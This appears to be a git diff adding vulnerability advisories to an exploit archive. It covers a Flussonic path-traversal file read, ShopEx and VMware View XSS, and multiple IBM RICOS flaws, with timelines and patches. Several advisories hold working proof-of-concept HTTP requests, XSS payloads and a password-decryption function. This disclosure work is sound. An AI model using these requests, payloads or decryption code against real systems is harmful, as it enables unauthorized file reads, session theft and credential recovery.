diff --git a/files.csv b/files.csv
index 657e3ad34..043d25b73 100755
--- a/files.csv
+++ b/files.csv
@@ -30564,3 +30564,9 @@ id,file,description,date,author,platform,type,port
33935,platforms/windows/remote/33935.txt,"rbot 0.9.14 - '!react' Command Unauthorized Access Vulnerability",2010-02-24,nks,windows,remote,0
33937,platforms/multiple/webapps/33937.txt,"TYPO3 't3m_cumulus_tagcloud' Extension 1.0 HTML Injection and Cross-Site Scripting Vulnerabilities",2010-05-05,MustLive,multiple,webapps,0
33938,platforms/hardware/remote/33938.txt,"Sterlite SAM300 AX Router 'Stat_Radio' Parameter Cross-Site Scripting Vulnerability",2010-02-04,"Karn Ganeshen",hardware,remote,0
+33939,platforms/java/webapps/33939.txt,"ShopEx Single 4.5.1 'errinfo' Parameter Cross Site Scripting Vulnerability",2010-02-06,"cp77fk4r ",java,webapps,0
+33940,platforms/multiple/remote/33940.txt,"VMware View 3.1.x URL Processing Cross-site Scripting Vulnerability",2010-05-05,"Alexey Sintsov",multiple,remote,0
+33941,platforms/windows/remote/33941.html,"TVUPlayer 2.4.4.9beta1 'PlayerOcx.ocx' Active X Control Arbitrary File Overwrite Vulnerability.",2010-02-03,"Evdokimov Dmitriy",windows,remote,0
+33942,platforms/jsp/webapps/33942.txt,"IBM Algorithmics RICOS 4.5.0 - 4.7.0 - Multiple Vulnerabilities",2014-07-01,"SEC Consult",jsp,webapps,80
+33943,platforms/aix/dos/33943.txt,"Flussonic Media Server 4.1.25 - 4.3.3 - Aribtrary File Disclosure",2014-07-01,"BGA Security",aix,dos,8080
+33944,platforms/windows/remote/33944.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.X Bypass",2014-07-01,sickness,windows,remote,0
diff --git a/platforms/aix/dos/33943.txt b/platforms/aix/dos/33943.txt
new file mode 100755
index 000000000..4e8f0b759
--- /dev/null
+++ b/platforms/aix/dos/33943.txt
@@ -0,0 +1,133 @@
+Document Title:
+============
+Flussonic Media Server 4.3.3 Multiple Vulnerabilities
+
+Release Date:
+===========
+June 29, 2014
+
+Product & Service Introduction:
+========================
+Flussonic is a mutli-protocol streaming server with support for many protocols, including HDS, HLS, RTMP, RTSP, HTTP, MPEG-TS. Flussonic has the capability of capturing multimedia from external sources, such as video cameras, satellite TV and other multimedia servers (Wowza, Flash Media Server and Red5).
+
+Flussonic operates on the highly flexible and fast Erlang platform that facilitates impressive performance during parallel data processing, failure safety for servers, and scaling options up to a sophisticated distributed data network.
+
+Abstract Advisory Information:
+=======================
+BGA Security Team discovered an arbitrary file read and arbitrary directory listing vulnerability in Flussonic Media Server 4.3.3
+
+Vulnerability Disclosure Timeline:
+=========================
+June 26, 2014 : Contact with Vendor
+June 26, 2014 : Vendor Response
+June 26, 2014 : Version 4.3.4 Deployed
+June 29, 2014 : Public Disclosure
+
+Discovery Status:
+=============
+Published
+
+Affected Product(s):
+===============
+Erlyvideo, LLC
+Product: Flussonic Media Server 4.1.25 - 4.3.3
+
+Exploitation Technique:
+==================
+AFR: Remote, Unauthenticated
+ADL: Remote, Authenticated
+
+Severity Level:
+===========
+High
+
+Technical Details & Description:
+========================
+1. Arbitrary File Read (Unauthenticated)
+It’s possible to read any files from the server (with the application’s user’s permissions) by a simple HTTP GET request. Flussonic’s web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, it’s possible to login any Flussonic web interface using that method.
+
+2. Arbitrary Directory Listing (Authenticated)
+It’s possible to list any directories’ content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”.
+
+
+Proof of Concept (PoC):
+==================
+Proof of Concept AFR Request & Response:
+
+GET /../../../etc/flussonic/flussonic.conf HTTP/1.1
+Host: 6.6.6.100:8080
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+
+HTTP/1.1 200 OK
+Connection: keep-alive
+Server: Cowboy
+Date: Thu, 26 Jun 2014 09:50:57 GMT
+Content-Length: 191
+Content-Type: text/plain
+Last-Modified: Tue, 24 Jun 2014 22:10:53 GMT
+Etag: 1452b98181c562b2e2d041a3e1fe2af0cffe8687
+
+# Default ports Flussonic M1 Media server listens on
+http 80;
+http 8080;
+rtmp 1935;
+rtsp 554;
+pulsedb /var/run/flussonic;
+edit_auth flussonic letmein!;
+
+live mylive;
+
+file vod {
+path priv;
+}
+
+2. Proof of Concept ADR Request & Response:
+
+GET /flussonic/api/list_files?subpath=../../../etc HTTP/1.1
+Host: 6.6.6.100:8080
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Authorization: Basic Zmx1c3NvbmljOmxldG1laW4h
+Connection: keep-alive
+
+HTTP/1.1 200 OK
+Connection: keep-alive
+Server: Cowboy
+Date: Thu, 26 Jun 2014 11:04:12 GMT
+Content-Length: 7555
+X-Route-Time: 28
+X-Run-Time: 8090
+Content-Type: application/json
+
+{“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"},
+………
+{“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]}
+
+
+Solution Fix & Patch:
+================
+Update version 4.3.4
+
+Security Risk:
+==========
+The risk of the vulnerabilities above estimated as high and medium.
+
+Credits & Authors:
+==============
+Bilgi Güvenliđi Akademisi
+
+Disclaimer & Information:
+===================
+The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
+
+Domain: http://bga.com.tr/advisories.html
+Social: http://twitter.com/bgasecurity
+Contact: bilgi@bga.com.tr
+
+Copyright © 2014 | BGA
\ No newline at end of file
diff --git a/platforms/java/webapps/33939.txt b/platforms/java/webapps/33939.txt
new file mode 100755
index 000000000..601e1bbd0
--- /dev/null
+++ b/platforms/java/webapps/33939.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/39941/info
+
+ShopEx Single is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+ShopEx Single 4.5.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/?gOo=ZXJyb3IuZHd0&errinfo=PHNjcmlwdD5hbGVydCgiWFNTRUQiKTwvc2NyaXB0Pg==
\ No newline at end of file
diff --git a/platforms/jsp/webapps/33942.txt b/platforms/jsp/webapps/33942.txt
new file mode 100755
index 000000000..1db6ddc2e
--- /dev/null
+++ b/platforms/jsp/webapps/33942.txt
@@ -0,0 +1,361 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA1
+
+SEC Consult Vulnerability Lab Security Advisory < 20140630-0 >
+=======================================================================
+ title: Multiple severe vulnerabilities
+ product: IBM Algorithmics RICOS
+ vulnerable version: 4.5.0 - 4.7.0
+ fixed version: 4.7.0.03
+ CVE number: CVE-2014-0894
+ CVE-2014-0871
+ CVE-2014-0870
+ CVE-2014-0869
+ CVE-2014-0868
+ CVE-2014-0867
+ CVE-2014-0866
+ CVE-2014-0865
+ CVE-2014-0864
+ impact: critical
+ homepage: http://www-01.ibm.com/software/analytics/algorithmics/
+ found: 2013-12-19
+ by: A. Kolmann, V. Habsburg-Lothringen, F. Lukavsky
+ SEC Consult Vulnerability Lab
+ https://www.sec-consult.com
+=======================================================================
+
+Vendor description:
+- -------------------
+IBM Algorithmics software enables financial institutions and corporate
+treasuries to make risk-aware business decisions. Supported by a global
+team of risk experts based in all major financial centers, IBM
+Algorithmics solution offerings include market, credit and liquidity risk,
+as well as collateral and capital management.
+
+Source: http://www-01.ibm.com/software/analytics/algorithmics/
+
+RICOS is a pre-deal limit management solution part of the Algo Suite.
+
+
+Business recommendation:
+- ------------------------
+The identified vulnerabilities affect integrity and confidentiality of the
+risk management system. SEC Consult does not recommend to rely on RICOS as
+part of risk management until a thorough security review has been performed
+by security professionals. As a workaround, access should be limited only to
+trusted users internally and sample checks regarding the plausibility of limits
+should be performed manually.
+
+
+Vulnerability overview/description:
+- -----------------------------------
+1) Information Disclosure (PSIRT#1440 / CVE-2014-0871 / CVSS 4.3)
+The Tomcat configuration discloses technical details within error messages to
+the user, which allows an attacker to collect valuable data about the
+environment of the solution.
+
+2) Password Disclosure (PSIRT#1441 / CVE-2014-0894 / CVSS 3.5)
+The password and the username of the backend database are disclosed in
+clear-text to the user of the web application. This allows attackers to
+directly connect to the backend database and manipulate arbitrary data stored
+in the database (e.g. limits).
+
+3) Non-permanent Cross-Site Scripting (PSIRT#1442 / CVE-2014-0870 / CVSS 4.3)
+Several parameters in the RICOS web front end and the Blotter are not properly
+sanitized and cause Cross-Site Scripting vulnerabilities. Attackers can steal
+user sessions and impersonate other users while performing arbitrary actions
+on behalf of the victim user.
+
+4) Broken Encryption (PSIRT#1443 / CVE-2014-0869 / CVSS 4.3)
+Weak cryptographic algorithms, being used to store and transfer
+user's passwords, allow an attacker to retrieve the plain-text passwords
+without further knowledge of cryptographic keys.
+
+5) Manipulation of read-only data / dual control mechanism bypass (PSIRT#1444 / CVE-2014-0868 /
+CVSS 3.5)
+Several fields of stored data within RICOS are marked as read-only in the web
+application, disallowing modification of certain fields. These checks are only
+performed client-side, allowing an attacker to alter arbitrary data. An
+attacker can create a limit, alter the username of the created limit and
+confirm the limit himself, circumventing dual control mechanisms advertised by
+RICOS.
+
+6) Cross-Site Cookie Setting (PSIRT#1445 / CVE-2014-0867 / CVSS 4.3)
+A vulnerable page in RICOS allows an attacker to set and overwrite arbitrary
+cookies for a user that clicks on a manipulated link.
+
+7) Plain-text submission of passwords (PSIRT#1446 / CVE-2014-0866 / CVSS 4.3)
+The RICOS fat client submits user credentials in plain-text. An attacker with
+access to the network communication can perform man-in-the-middle attacks and
+steal user credentials.
+This vulnerability also applies to the Blotter, where authentication is
+performed unencrypted.
+
+8) Client-side Input Validation (PSIRT#1447 / CVE-2014-0865 / CVSS 3.5)
+The RICOS fat client performs input validation only client-side. This allows
+an attacker to alter arbitrary data. An attacker can create a limit, alter
+the username of the created limit and confirm the limit himself, circumventing
+dual control mechanisms advertised by RICOS.
+
+9) Cross-Site Request Forgery (PSIRT#1448 / CVE-2014-0864 / CVSS 4.3)
+The web application does not verify that requests are made only from within
+the web application, allowing an attacker to trick users into performing
+requests to the web application. This allows an attacker to perform tasks on
+behalf of the victim user like modifying limits.
+
+
+Proof of concept:
+- -----------------
+1) Information Disclosure
+The following URL causes a status 404, disclosing the Tomcat version:
+https://ricos/ricos470/classes/
+
+If control characters (i.e. \x00) are sent as part of the cookie, a stack trace
+is triggered
+
+2) Password Disclosure
+The following request sent by the client during regular communication shows the
+database connection settings including the username and the password in
+clear-text.
+
+POST /ricos470/Executer HTTP/1.1
+Host: ricos
+
+...SNIP...
+
+...SNIP...
+
+3) Non-permanent Cross-Site Scripting
+The following URLs demonstrate Cross-Site Scripting vulnerabilities:
+
+POST /ricos470/rcore6/main/showerror.jsp HTTP/1.1
+Host: ricos
+
+Message=%0D%0A&Stack=java.lang....
+
+https://ricos/ricos470/rcore6/main/buttonset.jsp?ButtonsetClass=x";+alert(document.cookie);//x
+
+https://ricos/ricos470/rcore6/frameset.jsp?PROF_NAME=&Caller=login&ChildBrowser=Y&MiniBrowse=Y&OBJECT=profile_login&CAPTION_SELECT=MNU_PROFILE_VIEW&MBName=profile_login')");alert(document.cookie);//
+
+http://ricos/algopds/rcore6/main/browse.jsp?Init=N";alert(document.cookie)&Name=trades&StoreName=trades&HandlerFrame=Caption&ShowStatus=N&HasMargin=Y
+
+
+http://ricos/algopds/rcore6/main/ibrowseheader.jsp?Name=trades;alert(document.cookie)&StoreName=trades;alert(document.cookie)&STYLESHEET=browse"/>
+
+4) Broken Encryption
+The user's password is transported frequently in requests within the application.
+The following function decrypts the password without requiring any cryptographic key:
+
+public static void decrypt(String string)
+{
+ int nRadix = 32;
+ int nR2 = nRadix * nRadix / 2;
+ GregorianCalendar cal = new GregorianCalendar();
+ String key = string.substring(0, 2);
+ int nKey = Integer.parseInt(key, 32);
+
+ String encPw = string.substring(2, string.length());
+ int y = 0;
+ for (int i = 0; i < encPw.length(); i+=2)
+ {
+ String aktuell = encPw.substring(i,i+2);
+ int new_value = Integer.parseInt(aktuell, 32);
+ int character = - nKey * (y + 1) % nR2 + new_value;
+ char decrypt = (char) character;
+ System.out.print(decrypt);
+ y = y + 1;
+ }
+}
+
+5) Manipulation of read-only data / dual control mechanism bypass
+The following example illustrates how to manipulate a request so that the server
+saves it on behalf of another user (only the relevant parts are shown):
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[...]
+
+
+[...]
+
+
+
+[...]
+
+
+
+[...]
+
+
+[...]
+
+
+
+
+
+[...]
+
+
+
+
+[...]
+
+
+
+
+
+[...]
+
+
+
+
+
+
+
+
+6) Cross-Site Cookie Setting
+The following URL allows setting of arbitrary cookies:
+
+https://ricos/ricos470/rcore6/main/addcookie.jsp?test-cookie=cookie-content
+
+7) Plain-text submission of passwords
+Neither the fat client nor the Blotter use https to communicate with the
+backend server. Both send unencrypted credentials via http during authentication.
+
+8) Client-side Input Validation
+By manipulating serialized objects that are transmitted by the fat client,
+it is possible to change the user name who created a limit, allowing an attacker
+to bypass dual control mechanisms.
+
+9) Cross-Site Request Forgery
+The following request, sent on behalf of an authenticated user will e.g.
+change the currency of a given deal:
+
+POST http://ricos/ricos470/Executer HTTP/1.1
+Host: ricos
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+...SNIP...
+
+
+Vulnerable / tested versions:
+- -----------------------------
+IBM Algorithmics RICOS 4.71
+
+
+Vendor contact timeline:
+- ------------------------
+2014-01-24: Contacting vendor through psirt@vnet.ibm.com
+2014-01-24: Vendor response, will likely require more than 30 days to resolve issues
+ asking for acknowledgements
+2014-01-24: Sending acknowledgements
+2014-01-29: Vendor assigns PSIRT advisory numbers 1440-1448 to reported issues
+2014-02-07: Vendor confirms 8 of 9 vulnerabilities and sends CVE and CVSS
+2014-02-10: Providing further information on assumed to be false positive issue 1441
+2014-02-14: Telco to clarify vulnerability details and agree on further procedure
+ patches are scheduled for end of June 2014
+2014-02-20: Vendor confirms issue 1441 to be a vulnerability
+2014-05-27: Vendor announces that patches will be released on 2014-06-30
+2014-06-26: Vendor published patches and security bulletin
+ https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881
+2014-06-30: SEC Consult publishes the advisory
+
+
+Solution:
+- ---------
+Apply patch ACLM 4.7.0.03 FP5. More information:
+https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881
+
+
+Workaround:
+- -----------
+Limit access to RICOS and manually perform sample checks regarding the
+plausibility of limits.
+
+
+Advisory URL:
+- -------------
+https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
+
+Headquarter:
+Mooslackengasse 17, 1190 Vienna, Austria
+Phone: +43 1 8903043 0
+Fax: +43 1 8903043 15
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+Interested to work with the experts of SEC Consult?
+Write to career@sec-consult.com
+
+EOF F. Lukavsky / @2014
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v1.4.9 (MingW32)
+Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
+
+iQEcBAEBAgAGBQJTsZDnAAoJECyFJyAEdlkKDUIH/3d/PLRdTNA9EludLlr7M+K+
+uaBxgyajy8sT7dYMedR3EcxKxZSUGExnv+2X4GZN0Px8a9NvEewURIAiM+ZAsdYg
+uFKPtYcuhO6TyKV/QoPUsixEM3IgzyMpGqcf2qtWqNOb4jVpXvtyO2gLoHQNj04F
+uQl0v+1it2HNVxd6vEj2zj7neuOLb3WhE6ObDAlVkzcOutvTF84cVyNYpBBuCD6e
+0TsopvfkJ3l6iJPSvgXpl1gTmSoR0PfEC14JYVKCK0pTbhXc81J8YYGQnEklWazl
+EEUoMVM0I6Yzg9oXGpHf5cBX49pbzAYm5lhJkCDiSQ+2ueSYN0BEz3e2JMtDEZ8=
+=OFL7
+-----END PGP SIGNATURE-----
\ No newline at end of file
diff --git a/platforms/multiple/remote/33940.txt b/platforms/multiple/remote/33940.txt
new file mode 100755
index 000000000..6ecc3df2f
--- /dev/null
+++ b/platforms/multiple/remote/33940.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/39949/info
+
+VMware View is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+This issue affects VMware View versions prior to 3.1.3.
+
+http://www.example.com/not_a_real_page
\ No newline at end of file
diff --git a/platforms/windows/remote/33941.html b/platforms/windows/remote/33941.html
new file mode 100755
index 000000000..b21a61b3b
--- /dev/null
+++ b/platforms/windows/remote/33941.html
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/39956/info
+
+TVUPlayer ActiveX control is prone to a vulnerability that lets attackers overwrite arbitrary local files on the victim's computer in the context of the vulnerable application, typically Internet Explorer, using the ActiveX control.
+
+TVUPlayer 2.4.9beta1 [build1797] is vulnerable; other versions may be affected.
+
+
\ No newline at end of file
diff --git a/platforms/windows/remote/33944.html b/platforms/windows/remote/33944.html
new file mode 100755
index 000000000..b68386db4
--- /dev/null
+++ b/platforms/windows/remote/33944.html
@@ -0,0 +1,340 @@
+
+
+
+
+
+
+
+
+